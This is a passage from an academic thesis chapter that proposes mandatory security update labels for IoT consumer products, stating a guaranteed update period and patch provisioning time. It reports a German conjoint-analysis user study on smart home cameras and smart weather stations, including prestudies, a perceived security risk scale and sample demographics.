analyzed the impact of energy labels on the buying decisions concerning light bulbs and washing machines of Swiss consumers. However, we are the first to use conjoint analysis to assess the importance of a security-related label.

7.3 Security Labels for Consumers

Inspired by the success of existing product labels, we propose a label that enables users to compare security properties during buying decisions. We present the idea of a regulatory framework that accompanies the label, and discuss concerns that finally motivate the user study.

122 7.3 Security Labels for Consumers

7.3.1 Security Scales for Labeling

Learning from the success of the energy labeling initiatives, we asked how we can use a similar approach for security. First of all, an appropriate scale to measure security properties is required. We need a security scale that

1. can be intuitively understood by consumers, even if they have no security expertise; 2. enables them to easily compare products, as comparison lays the foundation for the choice between products; 3. and finally, does not require third-party product testing for market release.

The last requirement is based on the following considerations: Third-party testing is a long and costly procedure that might considerably delay the release of a new product. This involves the danger that manufacturers would choose testing laboratories that perform a relaxed and fast evaluation [217, 177], which again could lead to a false sense of security. In prior work, a number of security scales has been proposed that could be applied to IoT products. Many of them (e.g., [32, 167]) are based on the Common Vulnerability Scoring System (CVSS) [201] and used to categorize the seriousness and impact of existing security vulnerabilities. Although CVSS can serve as an indicator of future security properties, it cannot solely measure the current level of product security, as it is based on past vulnerability records. The time-to-compromise (TTC) [178] scale originated from the concept of the working time required to break a physical safe. In terms of IoT consumer products, this metric could measure the time it takes to break the security mechanisms of a product. According to our criteria, TTC is not applicable as it requires a third party to assess the product’s security. A security scale might also show levels of a security certification scheme. However, be- sides the need for a third party, security certification is not suitable to communicate security levels to consumers, as it might be misleading: Whereas consumers may assume that the whole product is certified, in reality only a subset of the components might be certified [217].

7.3.2 Security Update Labels

We conclude that, to the best of our knowledge, there are no suitable approaches to communicate the security level of an IoT product to consumers. And even if manufacturers would implement comprehensive security measures, security flaws in IoT products cannot be fully prevented. Prior research [7, 146] concluded that well-engineered code has an average defect rate of around 2 defects per 1,000 lines of code. If we accept the possibility of security vulnerabilities even in well-designed systems, the best approach would be to

123 7 Security Update Labels continuously support the repair of such defects as soon as they are disclosed. We propose a regulatory framework that demands brand-giving manufacturers to define an update policy for each IoT consumer product with the following properties:

1. Availability period: The availability of security updates determines the absolute timeframe in which the manufacturer ensures the patching of security vulnerabilities in the product’s software. In other words, it defines until which date (for example: ‘12/2024’) the manufacturer contractually warrants to provide security updates.

2. Provisioning time: When a security vulnerability in the software of an IoT con- sumer product was reported, the manufacturer has to investigate this issue and patch the software if needed. The update policy defines the maximum timeframe (for exam- ple: ‘30 days’) within which the manufacturer guarantees to provide software security updates.

Both attributes must be printed as a security update label on each adequate product such that consumers can compare this information when making a buying decision. The label content does not need to be authorized by a third party before the market release, similarly to the mandatory energy labels. If a manufacturer refuses to guarantee security updates, the label should explicitly display ‘no security updates guaranteed’ or a similar phrase.

7.3.3 An Idea for a Regulatory Framework

Following the example of the legislations for energy labeling [76, 88], market surveillance and consumer protection authorities should supervise the implementation of the security update labels, and conduct promotional and educational information campaigns in the introduction phase. We propose that each applicable product displays the label on the packaging, such that it can be considered and compared during buying decisions, and on the device itself to inform the consumer about the guaranteed availability of security updates after deployment. These labels should be mandatory for each consumer product that is able to directly or indirectly (e.g., over Bluetooth) connect to the Internet. The liability should be enforced only between the brand-giving company that is responsible for the definition of the update policy, and the buyer of the product. All further interactions between the brand-giving company and OEMs or other involved third parties should be regulated by the market. The vulnerability disclosure can be implemented in many ways. An approach might be to set up a public vulnerability reporting platform. This platform could ensure the docu- mentation of the reported vulnerabilities and would act as an information channel where the manufacturer announces the current state of the vulnerability handling to the affected consumers and policy-enforcing entities. The design of such a reporting platform could follow the proposal of the Centre for European Policy Studies [42, p.56] and is out of scope of this paper. Procedures could be implemented based on the established standards

124 7.3 Security Labels for Consumers for responsible vulnerability disclosure, e.g., ISO/IEC 29147 [140], and vulnerability han- dling, e.g., ISO/IEC 30111 [139]. When a suspected security vulnerability is found, the reporting entity files a vulnerability report via this platform, which in turn informs the affected manufacturers. After receiving the vulnerability report, the time-to-patch clock starts and the manufacturer investigates whether the vulnerability can be reproduced. If the manufacturer concludes that the reported vulnerability is an actual security flaw, a security patch shall be developed and provided within the guaranteed provisioning time. We propose that consumers have a right to compensation in the following cases:

• The manufacturer does not provide a required security patch within the guaranteed provisioning time. • The manufacturer provides a security patch, but the patch does not fix the bug, in- troduces other security problems, or has serious effects on the performance of the product.

For the cases of disputes about the effectiveness of provided updates or whether a bug requires a security patch, policymakers should establish an entity that enforces account- ability, judges the claims of the consumers, protects vulnerability reporters, and has the power to sanction manufacturers, similarly to the sanctions imposed by the General Data Protection Regulations (GDPR) in the EU [77, Art.58].

7.3.4 Concerns towards Security Update Labels

The proposal of security update labels might raise the following concerns.

Ineffectiveness. Some security vulnerabilities cannot be patched with updates. For example, a security flaw in the specification of an interconnected system might demand changes in other components that are not maintained by the manufacturer, or the hardware platform of the affected product cannot support the patched software due to memory or computational power constraints. In this case, the proposed label strengthens consumer rights as the consumer is entitled to compensation.

Misuse. Manufacturers might be motivated to spend even less resources on security of their products before releasing them. They might decide that they always can patch the product within a certain timeframe, which means that they simply could outsource the debugging of their products to the consumers. We believe that such behavior would damage the user acceptance and the brand image. Furthermore, this practice would lead to a high pressure on the manufacturers to deliver numerous security patches within limited time. In another scenario, manufacturers might try to transfer the liability regarding their products to offshore companies. These scenarios should be considered when defining the legislation.

125 7 Security Update Labels

Low User Acceptance. The security update labels could fail as they might not have the expected effect on consumers’ buying decisions. Prior user studies [297, 298, 96, 196] outline that consumers tend to be reluctant towards the installation of updates. This behavior results from a lack of clarity about the usefulness of updates as well as from negative update experiences in the past, such as unwanted changes in user interfaces or in functionality. In consequence, the attitude towards security updates is affected as users typically do not differentiate between different types of updates. Therefore, security update labels could have a low user acceptance. Potential moral hazard [232] could also lead to a low user acceptance. In our context, this means that users might not be willing to pay a price premium to protect against security vulnerabilities that will not affect them. An illustration are the attacks by the Mirai botnet [12], in which thousands of IoT consumer products deployed in Latin America attacked US-based Internet services. In this case, why would a Latin-American consumer pay a price premium for a security update guarantee that protects US businesses? The concerns of ineffectiveness and potential misuse depend on the legislation and business decisions of particular manufacturers. We leave the investigation of these concerns to future work. In the following, we investigate the concern of low user acceptance by means of a user study.

7.4 Concept of User Study

Although the concept of security update labels seems to be reasonable, there is no evidence of their acceptance by consumers. To investigate this issue, we conducted a user study with the objective to assess whether mandatory security update labels have the potential to be an important criterion in consumer decision making when buying an IoT product. If security update labels turn out to be important for consumers’ buying decisions, this would create economic incentives for manufacturers to guarantee the timely patching of security vulnerabilities in their IoT products. We consider the following research questions:

• RQ1: What is the relative importance of the availability period and provisioning time for security updates for buying decisions compared to other product attributes?

• RQ2: Are there differences in the relative importance of the availability period and provisioning time for security updates between products with a high perceived security risk compared to products with a low perceived security risk?

• RQ3: Are there differences in the relative importance of the availability and pro- visioning time for security updates according to demographic characteristics of the consumers?

• RQ4: Are there differences in the relative importance of the availability and provi- sioning time for security updates depending on security behavior intentions, privacy concerns, and security risk perception of the consumers?

126 7.4 Concept of User Study

Figure 7.2: Structure of the user study.

In the following, we investigates these research questions for German consumers. Germany has the largest consumer market within the EU, and the fourth largest consumer market worldwide after USA, China, and Japan [313].

Structure of the User Study. We utilize conjoint analysis, as this method is well suited for our objectives (cf. Section 7.2.3): We aim to determine the influence of the availability period and provisioning time attributes on consumers’ choices. This includes whether these attributes are desired at all (i.e., do consumers care about the availability of security updates?), and which attribute levels are more attractive (i.e., do consumers favor short provisioning time or long availability periods?). To answer the research questions, we needed to choose product categories that differ in the perceived security risk. We decided on two product categories as this number is sufficient to answer the research questions: one with a high perceived security risk as well as one with a low perceived security risk. The user study followed a three-stage approach as shown in Figure 7.2: In the first stage (Prestudy 1), two suitable product categories were selected. In the second stage (Prestudy 2), we determined the most important product attributes and their levels for each of the two product categories. In the third stage (Conjoint Analysis), we assessed the consumers’ preferences (RQ1), comparing the attributes of the security update label with other im- portant product attributes. Finally, we validated the preference model, compared the product categories (RQ2), and performed a segmentation analysis (RQ3, RQ4).

Ethics and Recruitment. The study design was approved by the data protection office of the authors’ institution. All survey answers were associated with pseudonyms that did not provide any information about the identity of the respondents. All data was processed in accordance with the German data protection laws. The online surveys were hosted on

127 7 Security Update Labels a web server that is provided by the authors’ institution, and secured such that only authorized entities have access to the collected data. The respondents for the online surveys were recruited at an online crowdworker platform, as prior work showed that such samples are appropriate for security research [242]. We used the Clickworker platform [49], which claims to have the largest crowd of German- speaking workers. For all online surveys, we pre-selected the respondents with following characteristics: all genders, age between 18 and 65, and Germany as country of residence. The crowdworkers were paid according to the German minimum wage of e8.84 per hour.

Translation of Psychometric Scales. As we run our surveys with German-speaking respondents, we translated all items of utilized English psychometric scales. These scales are facilitated to measure, e.g., the respondents’ privacy concerns [64] or security behavior intentions [259]. To take care of a reliable translation, we utilized a methodology proposed by Venkatesh et al. [299]. Three bilingual domain experts translated the English scales into German individually. In a second step, these experts compared their translations, discussed differences, and agreed on a single final version. Finally, three bilingual speak- ers (one English native speaker, a professional translation service, and a German native speaker who lived for several years in the UK) retranslated the German scales back into the original language. Through verifying that the original scales matched the retranslated scales semantically, the translation was considered successful.

Statistical Data Analysis. We denote by µ the mean value, and by σ the standard deviation. To assess the practical meaning of the statistical results, we report effect sizes [51]: For unpaired t-tests, the absolute value of d < 0.5 is considered small, d between 0.5 and 0.8 medium, and d > 0.8 large effect. For paired t-tests, effect size dz is interpreted identically to d. Cramer’s V measures effect sizes for χ2 tests, and r for ANOVA1. Values around 0.10 indicate a small, 0.30 a medium, and 0.50 a large effect [94].

7.5 Preliminary Studies

7.5.1 Prestudy 1: Selection of Product Categories

The objective of this prestudy is to identify two categories of IoT products according to the following criteria:

(C1) Both categories should differ significantly in their perceived security risk.

1 r denotes effect size for one-way independent ANOVA according to Field [94, p. 472] and is calculated as pη2.

128 7.5 Preliminary Studies

(C2) Both categories should be similar concerning other central product attitudes and their purchase intentions: Attitude towards product category (in terms of favor, likability, pleasure) [193], involvement with product category (in terms of, e.g., fas- cination, excitement) [197], consumption motive (hedonistic or utilitarian) [305], de- sirability to possess products of this product category [173], and purchase intention for products of this product category [191]. The items of these scales are reported in [211, Appendix A].

Perceived Security Risk Scale. To distinguish between product categories with a high and low perceived security risk (criterion C1), we needed a scale that measures the perceived security risk associated with IoT consumer products. After an extensive literature review, we concluded that there is no scale that sufficiently fits our purpose. Declined candidates [83, 64, 188] comprised scales that measure security and privacy risks in e-commerce settings. However, because IoT products may have adverse effects on the physical world, their security risks are fundamentally different. Thus, we developed a perceived security risk scale for IoT consumer products using a similar methodology as proposed by Davis [58]. In the first step, we defined the concept of the perceived security risk in IoT products. Perceived risk is defined as the customers’ perceptions of uncertainty and unfavorable consequences concerning a product or a service [165]. In the context of security, uncertainty means the probability of a security incident, while consequences are the loss caused by such an incident. We decided to measure only consequences with our scale. We think that it is very difficult for non-experts to determine the probability of a security incident associated with a particular IoT product category, because they would need to assess the quality of the product’s security measures as well as the attractiveness of the product for attackers. On the other hand, the assessment of consequences of a security incident requires knowledge about the deployment and utiliza- tion of the product. Usage scenarios are known to consumers, and therefore, they can imagine potential consequences. As a result, we defined that perceived security risk for an IoT product exists if security vulnerabilities in this product are perceived to lead to negative consequences for the user. We further considered classical risk categories for product purchase by Jacoby and Kaplan [141], which have often been used to measure perceived risk in marketing research [52, 165]. Additionally, we adapt risk categories by Featherman and Pavlou [83], who already adapted Jacoby and Kaplan’s categories for e-commerce settings. We split the perceived security risk in four risk categories: ‘general’2, ‘privacy’, ‘physical’, and ‘financial’. Jacoby and Kaplan [141] and Featherman and Pavlou [83] present further risk categories that we did not consider because they have low relevance for the security risk of IoT products: ‘performance’, ‘time’, ‘psychological’, and ‘social’. Although the performance of IoT products can be affected in a security incident, performance deficiencies

2 Jacoby and Kaplan [141] denote this risk category as ‘overall’. We renamed it to ‘general’ since ‘overall’ could be misunderstood as average score over all risk categories.

129 7 Security Update Labels

Table 7.1: Perceived security risk scale (translated to English) # Risk Category Item If a third party takes unauthorized control over [product], there is a high risk that... 1 ...the consequences are severe. 2 ...it leads to high potential of abuse. General 3 ...it is used for criminal purposes. 4 ...a serious security threat exists. 5 ...this has a serious impact on privacy. 6 Privacy ...they access personal information. 7 ...it steals private data. 8 ...the health of its owners or other people is at risk. 9 ...the safety of its owners or other people is at risk. Physical 10 ...it has harmful consequences to the physical integrity of its owner or other people. 11 ...the owner suffers financial losses. 12 Financial ...it is misused for crimes involving financial loss. 13 ...it leads to financial loss.

Items measured on 7-point Likert scale ranging from 1 = ‘strongly disagree’ to 7 = ‘strongly agree’. that affect functionality in a dangerous way are already covered by physical risk. The risk of wasting time in case of a security incident exists for all product categories alike. We excluded psychological risk as its original definition relates to the consumer’s self- image or self-concept regarding a product [141]3. Effects of IoT products on consumers’ psychological state (e.g., perception of surveillance, or privacy violations) are considered in our scale by items in the risk categories ‘privacy’ and ‘general’. Finally, we did not take social risk into account since privacy risk already covers effects on the status in one’s social groups. Item candidates were generated and iteratively improved through expert reviews by 14 experts from the domains of cybersecurity, psychology and marketing research. The final scale is presented in Table 7.1 and consists of 13 items relating to risk categories ‘gen- eral’, ‘privacy’, ‘physical’, and ‘financial’. For the statistical comparison of the product categories, we averaged the scale to form a composite index.

Survey Structure and Data Collection. We selected eight candidate product cate- gories through an overview of popular IoT consumer products on online shopping websites

3 Definition of psychologocal risk [141]: “the chances that an unfamiliar brand of [product] will not fit in well with your self-image or self-concept.”

130 7.5 Preliminary Studies and expert judgment: smart alarm systems, smart door locks, smart light bulbs, smart home cameras, smart smoke detectors, smart thermostats, smart vacuum robots, and smart weather stations. In the surveys, the products were introduced in a randomized order. Each product category was introduced with an exemplary product picture and a short text that explained the products’ features and usage scenarios. We emphasized that all these products connect to the Internet. To determine the sample size for this prestudy, we performed a power analysis [82] for paired t-tests. Assuming that large effects indicate practical relevance (Cohen’s dz = 0.8), and the desired power of 0.99, the power analysis determined 30 participants as sufficient. We collected data with an online questionnaire using LimeSurvey [180]. The questionnaire was pretested by six experienced colleagues at our institutes. During the tests we realized that the amount of data that we wanted to collect would lead to a long and exhausting survey. Therefore, we decided to split the survey into two smaller questionnaires that should be answered by two independent groups of respondents. One group answered the perceived security risk (C1) for all eight product categories, while the other group evaluated the scales of C2 for all eight product categories. Each group consisted of 30 crowdworkers. Through test runs, we estimated the average time to answer the surveys to be 10 to 12 minutes. We paid each crowdworker e1.80 for 12 minutes.

Results. Sixty respondents (23 female, 37 male) aged between 19 and 62 years (µ = 38.5, σ = 10.7) answered the surveys. We did not exclude any responses. The collected data was analyzed using IBM SPSS [94]. The perceived security risk scale (C1) showed good statistical properties, which are not presented here for brevity. However, in [211, Appendix B], we present the statistical properties of the scale using the results of the main study (Section 7.6). For all scales of C2, Cronbach’s alpha, a measure that defines the inner consistency of a scale, was above the recommended threshold of .700 (>.858) [94]. The scores of the C1 and C2 scales are presented in Table 7.2. The perceived security risk scale (C1) showed good statistical properties, which are not presented here for brevity. However, in [211], we present the statistical properties of the scale using the results of the main studies (Section 7.6) with 731 and 735 participants. For all scales of C2, Cronbach’s alpha, a measure that defines the inner consistency of a scale, was above the recommended threshold of .700 (>.858) [94]. According to our criteria, we found three candidate pairs of product categories that do not statistically significantly differ from each other in the factors of C2, but differ statistically significantly in the perceived security risk:

1. Smart home camera and smart weather station (t(29) = 7.57, p < 0.001, dz = 1.383)

2. Smart smoke detector and smart thermostat (t(29) = 2.09, p < 0.05, dz = 0.381)

3. Smart smoke detector and smart vacuum robot (t(29) = 3.29, p < 0.01, dz = 0.600)

131 7 Security Update Labels

Table 7.2: Mean µ and standard deviation σ from Prestudy 1 (n = 30) sorted by perceived security risk. y ement tion

Product Category Perceived Securit Risk Attitude Consumption Motive Purchase Inten Involv Desirability 5.76 4.77 1.74 3.37 4.26 3.90 Smart Alarm System µ σ 1.33 1.17 1.01 1.57 1.13 1.47 5.65 3.16 2.42 2.39 3.22 2.70 Smart Door Lock µ σ 1.63 1.38 1.43 1.55 1.28 1.34 5.49 3.86 3.44 3.02 3.56 3.57 Smart Home Camera µ σ 1.41 1.82 1.73 1.60 1.41 1.59 4.12 5.16 1.74 4.27 4.52 4.27 Smart Smoke Detector µ σ 1.55 1.34 1.03 1.79 1.30 1.55 3.67 5.24 1.72 4.52 4.52 4.67 Smart Thermostat µ σ 1.61 1.38 0.97 1.69 1.20 1.27 3.40 3.90 4.39 3.24 3.31 3.33 Smart Light Bulb µ σ 1.45 1.48 1.63 1.61 1.41 1.56 3.10 4.76 2.30 4.08 4.12 3.97 Smart Vacuum Robot µ σ 1.67 1.84 1.38 2.09 1.54 1.87 2.98 4.38 2.90 3.51 3.75 3.67 Smart Weather Station µ σ 1.51 1.83 1.47 1.87 1.63 1.69

We decided on the first pair as these product categories have the highest difference between their perceived security risk scores.

7.5.2 Prestudy 2: Definition of Product Attributes and Levels

After two product categories were chosen, the next step was to determine product at- tributes that will be used in the conjoint analysis. The number of attributes should be reasonable such that a respondent can process them cognitively [111]. Otherwise re- spondents might tend to use shortcut heuristics that ignore less important features [72]. We decided for 7 attributes per product category. Two attributes were reserved for the attributes of the security update label (availability period and provisioning time). The re- maining five attributes comprised existing product attributes that depend on the product category. We paid attention to avoid correlation between attributes, which would lead to

132 7.5 Preliminary Studies illogical profiles. In the literature on conjoint analysis, the specification of attributes lacks a golden standard [186] and is approached in various ways, such as focus groups, surveys, or expert judgements.

Method. We conducted an online survey to identify the most important attributes for each product category to use in conjoint analysis. For this, attribute candidates were col- lected from online shopping websites. We prepared an online questionnaire on LimeSurvey that listed these 18 individual attributes, which are given in Table 7.3. Respondents rated the importance of these attributes for their buying decision using the dual-questioning methodology by Alpert [8, 302]. The respondents rated following two items on 7-point Likert scales: “How important is each of these attributes in your buying decision?” and “How much difference do you feel, there is among products of the product category ‘[prod- uct]’ in each of these attributes?”. Both scores were multiplied to get an overall score for each product attribute. The higher the overall score, the more important is the attribute.

Data Collection. We recruited 30 crowdworkers for this preliminary survey who were each paid e0.75 (reward equivalent for 5 minutes). In the screening of the collected data, we found that one participant clicked the middle option for almost all attributes and was six times faster than the average participant. This person was excluded from the evaluation [21].

Results. The final set of participants consisted of 29 respondents (18 female, 11 male) in the age between 20 and 63 years (µ = 35.3, σ = 11.5). The results of the dual-questioning method are reported in Table 7.3. In summary, the product attributes that are perceived as most important for smart home cameras were price, resolution, field of vision, frame rate, and zoom function. For smart weather stations, the most important product attributes were price, battery lifetime, pre- cision, rain and wind sensor, and expandability for multiple rooms. In Table 7.3, we listed ‘solar panel for energy generation’ as second most important product attribute for smart weather stations. However, in line with prior research [128], we refrained from this at- tribute because it correlates with ‘battery lifetime’, and the correlated attributes bear the risk of threatening the study’s validity. We decided to include ‘battery lifetime’ as nearly all smart weather stations use batteries, while solar panels are only a rare feature in this product category. In addition to these attributes, we added the availability and provi- sioning time of security updates introduced in Section 7.3.2. The final list of attributes is shown in Table 7.4.

Attribute Levels. For each attribute, a discrete number of levels had to be specified. The number of attribute levels should be as low as possible and does not need to cover the full feature range of the attribute. As recommended [264], we defined two to four

133 7 Security Update Labels

Table 7.3: Considered product attributes (n = 29) and their dual-questioning scores (higher score values indicate a higher perceived importance for this attribute) Smart Home Camera Rank Product Attribute µ σ 1. Price 31.76 12.83 2. Solar panel for energy generation 26.66 12.01 3. Battery lifetime 26.31 11.33 4. Precision level of measurements 23.72 10.98 5. Rain and wind measurements 23.69 10.99 6. Expandability for multiple rooms 23.48 13.06 7. Max. wireless range 23.34 10.17 8. Warning feature (e.g., storm) 22.66 10.59 9. How many days of local weather forecast 22.14 8.80 10. Measurement rate 19.14 10.15 11. Brand/ manufacturer 18.28 10.12 12. Alarm upon preset threshold exceedance 18.03 10.69 13. Seal of technical approval 17.76 10.14 14. Environmental label 17.14 12.23 15. Material of casing 16.62 10.45 16. Color of product 16.03 11.69 17. Alexa compatible 12.34 9.93 18. Accessibility label (fictive) 11.17 6.70 Smart Weather Station Rank Product Attribute µ σ 1. Price 30.59 12.69 2. Video resolution 26.79 12.22 3. Field of view 26.17 11.60 4. Video frame rate 24.41 11.21 5. Zoom function 23.10 11.85 6. Energy consumption 22.59 10.53 7. Face recognition 22.10 12.19 8. Night vision mode 21.79 9.60 9. Timing function for recordings 20.86 9.16 10. Type of power supply 19.24 8.59 11. Brand/ manufacturer 18.48 11.92 12. Seal of technical approval 18.48 12.21 13. Material of encasement 18.41 10.62 14. Environmental label 17.38 11.68 15. SD card slot 17.21 9.69 16. Color of product 14.52 10.21 17. Accessibility label (fictive) 14.14 8.73 18. Alexa compatible 11.21 9.19

134 7.5 Preliminary Studies

Table 7.4: Product categories with their respective attributes and attribute levels. Category Attribute Levels 1 Price e100, e120, e140, e160 2 Resolution HD, Full-HD 3 Field of vision 110°, 130°, 150° Smart 4 Frame rate 25fps, 30fps, 50fps home 5 Zoom function yes, no camera 6 Availability of security updates none, until 12/2020 (2 years), until 12/2024 (6 years) 7 Provisioning time for sec. updates none, within 10 days, within 30 days 1 Price e100, e120, e140, e160 2 Battery lifetime 1 year, 2 years, 3 years 3 Precision 0.2°C, 0.3°C, 0.5°C Smart ± ± ± 4 Rain/wind sensor yes, no weather 5 Expandability to multiple rooms yes, no station 6 Availability of security updates none, until 12/2020 (2 years), until 12/2024 (6 years) 7 Provisioning time for sec. updates none, within 10 days, within 30 days levels to keep the complexity of the conjoint analysis low. Similarly to the specification of the attributes, there is no golden standard in defining the attribute levels. We decided to specify the levels with reasonable values that we acquired through the examination of the most popular products in both product categories available on Amazon as of October 2018. Thereby, we took care to avoid the specification of extreme values that are considered outliers. We considered price levels in the realistic price ranges on the market. We found smart home cameras by 13 manufacturers with prices between e50 and e179 (around e110 on average), and smart weather stations by 10 manufacturers in the range between e54 and e176 (around e129 on average). To enhance the comparability, we defined the same price levels for both product categories. Furthermore, we decided not to use prices below e100 as the threshold between a two-figure price and a three-figure price might bias the importance of the price attribute considerably towards two-figure prices. Also, we consistently used 0-ending prices [286, 23] and finally chose four price levels with an equal spacing between e100 and e160. For all further product attributes, we chose two to three levels that reflect the attribute span of products on the market. All attributes and their levels are summarized in Table 7.4.

Focus Group. As the attributes of the security update label are unknown to consumers, we run a focus group to gain an intuitive description of the security update label’s at- tributes and their levels. The focus group consisted of 8 participants (5 females and 3

135 7 Security Update Labels males) in the age between 19 and 54 years (µ = 33.5, σ = 12.9) without professional cybersecurity background. Two participants had a professional IT background. Thus, we paid attention that these two participants did not dominate the discussion. We rewarded each participant with e10 for a one hour session. We started the focus group by estab- lishing the participants’ prior experience with IoT consumer products, their awareness of security problems in these products, as well as their experience with security updates in general. Then, we introduced the idea of the security update labels and asked the partic- ipants to write down how they would explain the attributes to family and friends. Each participant presented their explanations and we discussed them with the group. Based on the focus group discussion, we presented the availability period in the conjoint analysis survey as ‘availability of security updates’ (German: ‘Verf¨ugbarkeit von Sicher- heitsupdates’) with a fixed end date, e.g., ‘until 12/2020’, and with the relative period of time until this date (e.g. ‘2 years’) to reduce the cognitive effort for the respondents. Although the relative period is not part of the proposed label, the reduction of cognitive load was important as the respondents will compare availability attributes in 10 choice tasks. The levels of the availability attribute were chosen to reflect realistic conditions: There is always a level of non-availability (i.e., manufacturer does not guarantee secu- rity updates), a level similar to the usual warranty period of this class of products (i.e., 2 years), and a third level that exceeds the usual warranty period and is more oriented on the realistic lifetime of the product (i.e., 6 years). The provisioning time attribute was defined to reflect non-availability, a rather fast (and ideal) period of 10 days, and a slower (and more realistic) period of 30 days. We denoted the provisioning time attribute in the survey as ‘provision time of security updates’ (German: ‘Bereitstellungszeit von Sicherheitsupdates’). To exclude confusing profiles that occur from certain combinations of availability and provisioning time, e.g., the manufacturer does not provide security updates but offers a provisioning time of 30 days, we only allowed for meaningful combinations of both attributes.

7.6 Conjoint Analysis

We decided on a choice-based conjoint (CBC) analysis as this variant is the de-facto con- joint data collection standard in marketing research [262] (cf. Section 7.2.3). Although CBC’s data collection is considered less efficient than other conjoint data collection meth- ods, it provides a better predictor of real-world in-market behavior [237]. Furthermore, it allows a “no choice”-option that also contributes valuable information, i.e., that all options are unattractive.

7.6.1 Method We used Lighthouse Studio by Sawtooth Software [262] for survey setup and data analysis. Lighthouse Studio is a well-established and validated tool for conjoint analysis [218, 203].

136 7.6 Conjoint Analysis

To avoid fatigue, each respondent evaluated only one of the two product categories, whereas the product category was assigned randomly to the respondents. Upon start- ing the survey, general information about the context, privacy of collected data, and the scope of the survey were presented. The respondents expected a survey about a smart home product. Then, the particular product category was introduced with a short expla- nation about its features and exemplary product pictures. We asked if the respondent is familiar with this product category and if she owns such a product. In line with previous research [132, 279], we explained all attributes shown in Table 7.4 (except price) with a short description, to raise their comprehension and prevent misunder- standings. To validate the comprehension, the respondent answered a quiz that included a question for each attribute. For example, for the availability attribute, we asked “What does the availability of security updates specify?” with possible answers: (a) “for how long the manufacturer guarantees to provide security updates”, (b) “for how long the device is allowed to be used”, (c) “for how long the device guarantees to be protected against hacker attacks”. While the first answer was correct in this example, the order of possible answers was randomly permuted in the questionnaire. If the respondent chose a wrong answer, the correct answer was explained again. Also, the quiz did not follow the order of how the attributes were presented before to rule out learning effects. After the respondent became familiar with the attributes, the choice tasks for the conjoint analysis were explained: The respondent is presented with four product profiles and has to decide for the most attractive option. All product profiles are described by an attribute level for each product attribute (including the security update label attributes) in plain text. In addition to the set of product alternatives, there is always a “no choice”-option that can be chosen in case none of the four profiles is desirable. An exemplary choice task is depicted in Figure 7.3. Then, each respondent performed ten choice tasks including eight randomly-generated tasks, which were individual for each respondent, and two fixed holdout tasks, which were identical for all. The fixed holdout tasks were later used to validate the attribute preference model. This model is based on the eight randomly generated tasks and should be similar to the model based on the holdout tasks in order to ensure internal consistency of the conjoint analysis (Section 7.6.6). The respondents were not aware whether a choice task is randomly generated or fixed. Prior research [280] concluded that the order of the attributes affects the choice behavior. Therefore, we randomly permuted the order of all 7 attributes for each respondent but kept the same order for a particular respondent as it might be confusing otherwise. After the respondents performed the choice tasks, we measured the perceived security risk for the particular product category by facilitating the perceived security risk scale from Section 7.5.1. Finally, we used psychometric scales to measure the respondents’ privacy concerns with the Internet [64] as well as their security behavior intentions [259]. Next, we included control questions to assess whether the respondents had difficulties in understanding the survey, had been distracted, and if they took the choice tasks seriously.

137 7 Security Update Labels

Figure 7.3: Screenshot of a choice task in the conjoint questionnaire (translated to English).

These questions were used to identify unmotivated respondents that we later excluded from the analysis. Finally, we collected demographic data: gender, year of birth, voca- tional qualification, professional IT background, and net income. This data was used to determine the representativeness of the sample as well as for the segmentation. To ensure that the respondents stayed focused, we included a number of motivational statements in the questionnaire.

7.6.2 Pilot Study

The questionnaire was developed in multiple iterative rounds. After completing the fi- nal draft, we collected feedback from seven experts from academic and market research institutes. We asked whether they understood the attributes and tasks, and if anything could be misleading. Using their feedback, we re-worded some instructions. Finally, we tested the questionnaire with 60 crowdworkers to check that the questionnaire is working as expected, and to calculate the average task completion time needed to determine the compensation.

138 7.6 Conjoint Analysis

7.6.3 Sample Size

The sample size, i.e., number of respondents for our questionnaire, was chosen as a trade- off between increasing costs and decreasing sampling errors. Sampling error arises if the samples of respondents do not represent the population. Practical guidelines [226] on CBC analyses recommend at least 300 respondents for studies without segmentation. If a segmentation analysis is desired, as is the case with our study, then a minimum of 200 respondents per subgroup is advised. Since we aimed for a comparison of up to three subgroups, which is a usual configuration in a segmentation analysis, we decided to recruit around 800 respondents for each product category, and thus, 1,600 respondents in total. In the pilot study, the average time to answer the questionnaire was 8 minutes. Thus, we paid crowdworkers e1.20. We ensured that respondents of the prestudies could not participate in the main survey.

7.6.4 Sample Characteristics

We collected the data within a week in mid-December 2018. After a screening, we excluded 154 (9.5%) of the 1,620 collected data sets. We excluded 70 data sets due to low task completion times (within less than half of the pilot study’s average time), 48 data sets due to indications in the control questions, 19 data sets due to suspected multi-participation (same IP address and user agent), 16 data sets that answered more than two quiz questions wrong, and 3 data sets of respondents under 18 years. The final sample included 1466 data sets (640 female, 805 male) in the age between 18 and 65 years (µ = 33.8, σ = 11.2). Details of the demographic data are presented in Table 7.5. In comparison to the German population, the sample is biased towards males and high-educated persons. Furthermore, people in the age of 50 and above are underrepresented in this sample. However, the sample aligns to the target group of consumers interested in IoT consumer products, which is likewise biased towards males, age group 25-34, and higher incomes [278].

7.6.5 Results

In total, 731 respondents evaluated the product category ‘smart home camera’ and 735 respondents assessed the product category ‘smart weather station’. The high difference in the security risk perception between both product categories was confirmed: While the smart weather station achieved an average perceived security risk score of 3.65, the smart home camera achieved an average score of 5.50. This difference is highly statistically significant with the large effect size: t(1464) = 28.42, p < 0.001, d = 1.48. Cronbach’s alpha for all psychometric scales was above the recommended threshold of .700 (>.837) [94]. For the analysis of the collected conjoint data from the randomly-generated choice tasks, we used hierarchical Bayes estimation with default settings as recommended [262]. Using

139 7 Security Update Labels

Table 7.5: Demographic data of the sample compared with the German population. Sample Population All 1,466 female 640 44.0% 49.8%a Gender male 805 55.3% 50.2%a 3rd option 10 0.7% 18-24 339 23.1% 12.9%a 25-29 288 19.6% 9.6%a Age (in years) 30-49 432 29.5% 18.8%a 50-64 404 27.5% 58.7%a none 156 10.6% 22.8%a Vocational qualification vocational-oriented 582 39.7% 60.2%a academic 728 49.7% 17.0%a none 52 4.3% 17.9%b less than 900 288 23.5% 24.3%b Monthly net income (in e) 900 to 1,500 296 24.2% 22.7%b 1,500 to 2,600 377 30.8% 22.4%b more than 2,600 210 17.2% 10.2%b yes 249 17.6% Professional IT background no 1166 82.4%

aCensus 2011 (age 18-65) [86], bMikrozensus 2014 (all ages) [87] Missing answers are ignored for percent proportioning. this estimation method, we determined the average relative importance of each product attribute as well as the part-worth utility for each product level based on a total of 5,848 (home camera) and 5,880 (weather station) choice tasks. The relative importance of an attribute defines the relative impact (measured in percent) on the overall choice. The importances are ratio data meaning that an attribute with an importance of 20% is twice as much important as an attribute with an importance of 10% [225].

